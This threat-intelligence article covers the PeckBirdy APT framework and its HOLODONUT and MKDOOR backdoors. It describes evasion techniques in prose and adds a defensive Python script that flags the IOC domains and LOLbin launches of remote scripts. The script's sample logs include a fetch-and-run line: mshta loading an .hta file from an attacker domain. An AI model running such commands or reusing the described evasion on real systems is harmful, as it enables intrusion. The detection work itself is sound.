
In a rapidly evolving cyber threat landscape, a China-aligned advanced persistent threat (APT) group has been leveraging a sophisticated framework called PeckBirdy since 2023. Designed for maximum flexibility, this JScript-based command-and-control (C&C) system targets Asian gambling platforms and government networks, using multi-environment attacks and stolen code-signing certificates to evade detection. Its campaigns reveal an alarming blend of old-school scripting and modern stealth techniques, making it a persistent danger for organizations in the region.
Campaign Summary
Trend Micro researchers first identified PeckBirdy in 2023, when Chinese gambling sites were targeted via injected scripts. Users were tricked with fake Chrome update pages that triggered malicious downloads, a campaign tracked under SHADOW-VOID-044. By mid-2024, the threat shifted to more sensitive targets with SHADOW-EARTH-045, striking Asian government portals and corporate websites through credential theft scripts and MSHTA-based lateral movement.
PeckBirdy’s framework acts in stages: early watering-hole control, mid-stage reverse shell deployment, and late-stage full C&C operations. Its versatility spans browsers, MSHTA, WScript, ASP, Node.js, and .NET, exploiting living-off-the-land binaries (LOLbins) to remain under the radar.
At the heart of these campaigns are backdoors like HOLODONUT and MKDOOR, downloaded via PeckBirdy’s NEXLOAD loader. HOLODONUT is a modular .NET backdoor that evades AMSI/ETW defenses and executes shellcode in memory using the Donut loader. MKDOOR strengthens persistence by fetching core payloads, bypassing Microsoft Defender, and mimicking legitimate URLs to avoid detection. Both backdoors operate local HTTP servers to validate infections and support modular deployment.
PeckBirdy’s configuration system is highly adaptive. Victims receive unique IDs generated from hardware hashes or random strings, which guide attack behavior including target hosts, ports, retries, and heartbeat intervals. Communication prioritizes WebSocket connections, with fallbacks to Flash sockets, Comet, or HTTP/AJAX. Payloads are encrypted with AES using the attack ID as the key, while scripts also harvest cookies or exploit Chrome’s CVE-2020-16040 vulnerability.
Attribution links tie SHADOW-VOID-044 to UNC3569 (focused on gambling) and TheWizard, reflecting reused C2 infrastructure. Stolen certificates from South Korean gaming companies were also employed to mask Cobalt Strike payloads, echoing tactics seen in earlier BIOPASS RAT and Earth Lusca operations. SHADOW-EARTH-045 hints at Earth Baxia involvement, targeting Philippine educational institutions and overlapping with known IP infrastructure.
Detection requires vigilance. Indicators of compromise (IOCs) include domains such as oss-cdn[.]com and mkdmcdn[.]com. Security teams should restrict the LOLbins PeckBirdy abuses across its execution environments (MSHTA, WScript and similar), monitor for JScript injection attempts, and track unauthorized code-signing certificates. Trend Vision One queries using (MKDOOR OR HOLODONUT OR PECKBIRDY) AND MALWARE_DETECTION can help identify infections early.
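The detection guidance above can be turned into a small triage pass over existing telemetry. The following is an added example, not code from Trend Micro or from the article's author: it refangs the two IOC domains named here, flags DNS lookups for them or their subdomains, and flags process launches of the LOLbins the article names (mshta.exe, wscript.exe, plus cscript.exe and node.exe) whose command line pulls a remote URL or a .hta/.js script. The two log line formats and every sample line are constructed for the example; real sources such as Sysmon event 1 or DNS proxy logs need their own parsers.

```python
"""Triage log lines for the PeckBirdy indicators named in the article.

Added example (not Trend Micro's or the article author's code). The line
formats below are constructed assumptions, chosen to keep the example
self-contained; swap the two regexes for your own log schema.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# IOC domains from the article, written defanged as threat feeds usually are.
IOC_DOMAINS_DEFANGED = ["oss-cdn[.]com", "mkdmcdn[.]com"]

# LOLbins the article says PeckBirdy drives; cscript.exe is wscript's twin
# and node.exe covers the Node.js environment the framework supports.
LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe", "node.exe"}


def refang(domain: str) -> str:
    """Turn 'oss-cdn[.]com' into 'oss-cdn.com' so it can be matched."""
    return domain.replace("[.]", ".").lower()


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}


@dataclass
class Alert:
    rule: str
    line: str


def matches_ioc_domain(host: str) -> bool:
    """True for an exact IOC domain or any subdomain of one."""
    host = host.lower().rstrip(".")  # tolerate trailing-dot FQDNs
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


# Constructed formats: "<ts> DNS query=<host>" and "<ts> PROC image=<path> cmd=<cmdline>"
DNS_RE = re.compile(r"^\S+ DNS query=(?P<host>\S+)")
PROC_RE = re.compile(r"^\S+ PROC image=(?P<image>\S+) cmd=(?P<cmd>.*)$")
# Command lines that fetch from the web or run an HTA/JScript file.
REMOTE_RE = re.compile(r"https?://|\.hta\b|\.js\b", re.IGNORECASE)


def triage_line(line: str) -> Optional[Alert]:
    """Return an Alert if the line matches one of the two rules, else None."""
    m = DNS_RE.match(line)
    if m:
        return Alert("ioc_domain", line) if matches_ioc_domain(m.group("host")) else None
    m = PROC_RE.match(line)
    if m:
        image = m.group("image").rsplit("\\", 1)[-1].lower()  # basename of the binary
        if image in LOLBINS and REMOTE_RE.search(m.group("cmd")):
            return Alert("lolbin_remote_script", line)
    return None


def triage(lines) -> List[Alert]:
    """Run every line through the rules and keep the hits, in input order."""
    return [a for a in (triage_line(line) for line in lines) if a is not None]


# Constructed sample telemetry, not real captures.
SAMPLE_LOGS = [
    "2024-06-01T10:00:01Z DNS query=update.oss-cdn.com",
    "2024-06-01T10:00:02Z DNS query=www.example.org",
    "2024-06-01T10:00:03Z DNS query=mkdmcdn.com.",
    "2024-06-01T10:00:04Z DNS query=notmkdmcdn.com",
    r"2024-06-01T10:00:05Z PROC image=C:\Windows\System32\mshta.exe cmd=mshta.exe http://update.oss-cdn.com/a.hta",
    r"2024-06-01T10:00:06Z PROC image=C:\Windows\System32\wscript.exe cmd=wscript.exe C:\Temp\loader.js",
    r"2024-06-01T10:00:07Z PROC image=C:\Windows\System32\notepad.exe cmd=notepad.exe readme.txt",
    r"2024-06-01T10:00:08Z PROC image=C:\Windows\System32\wscript.exe cmd=wscript.exe //B logon.vbs",
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOGS):
        print(f"[{alert.rule}] {alert.line}")
```

Two details matter in practice: the subdomain check is deliberate, since the article notes MKDOOR mimics legitimate URLs, so an IOC feed entry for the apex domain should also catch hosts beneath it; and the "notmkdmcdn.com" line shows why a plain substring match is wrong. The fourth sample (wscript running a .vbs) is left unflagged on purpose, because the rule targets the JScript/HTA delivery the article describes rather than every script host launch.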
What Undercode Say:
PeckBirdy illustrates how APT actors are combining legacy scripting techniques with modern attack methods to expand their reach and evade detection. Its JScript base might seem outdated, but it provides broad compatibility across multiple execution environments, turning “old tech” into a potent weapon. By supporting browsers, Node.js, .NET, and Windows-native LOLbins, PeckBirdy can flexibly adapt to whatever environment the victim uses.
The modularity of HOLODONUT and MKDOOR demonstrates a shift in APT philosophy: attackers now prioritize memory-resident execution and stealthy persistence over noisy malware deployment. Evading AMSI/ETW, embedding stolen certificates, and leveraging WebSocket communications indicate a carefully engineered effort to remain invisible to traditional endpoint protections.
Another critical insight is PeckBirdy’s operational discipline. Campaigns like SHADOW-VOID-044 and SHADOW-EARTH-045 show sequential targeting: first low-value, high-volume targets to test infrastructure, then high-value, sensitive networks for maximum impact. This methodology mirrors the traditional “soft target to high-value” approach seen in other sophisticated Chinese APTs, but now implemented with modern C2 techniques.
PeckBirdy also highlights the growing risk of living-off-the-land (LOLbin) exploitation. By using legitimate system tools like MSHTA, WScript, and Node.js binaries, attackers reduce their forensic footprint and increase their chances of bypassing defenses. Combined with stolen code-signing certificates, even Cobalt Strike payloads appear legitimate, complicating incident response.
From a strategic perspective, PeckBirdy signals an increased convergence between financial and geopolitical objectives. Gambling platforms act as initial testing grounds, while government networks are the ultimate targets. This dual-use targeting strategy may allow attackers to fund campaigns while simultaneously gathering intelligence, showing a worrying level of operational sophistication.
For defenders, the key takeaway is proactive detection. Organizations must integrate threat intelligence feeds, continuously monitor for JScript anomalies, and track suspicious certificate usage. Layered detection across network, endpoint, and web vectors is essential because PeckBirdy’s multi-environment approach can evade any single security layer.
Finally, PeckBirdy exemplifies how adaptable and persistent modern APT campaigns have become. It is a stark reminder that even seemingly outdated technology, like JScript, can serve as the backbone of a highly sophisticated cyberattack when combined with modular malware and operational discipline.
Fact Checker Results:
✅ PeckBirdy is confirmed as a JScript-based C&C framework first observed in 2023 targeting gambling sites and Asian government networks.
✅ HOLODONUT and MKDOOR are modular backdoors delivered via PeckBirdy, with memory-resident execution and Defender bypass features.
✅ Campaigns SHADOW-VOID-044 and SHADOW-EARTH-045 are linked to UNC3569, TheWizard, and Earth Baxia APTs.
Prediction:
🔮 PeckBirdy’s methodology may soon inspire a wave of multi-environment, modular attacks across Southeast Asia and beyond.
🔮 The reuse of stolen certificates and LOLbin exploitation will likely become standard in APT campaigns, challenging current detection systems.
🔮 Organizations that fail to monitor JScript injections, certificate anomalies, and multi-vector payloads could see a significant increase in stealthy intrusions in the next 12–18 months.
References:
Reported By: cyberpress.org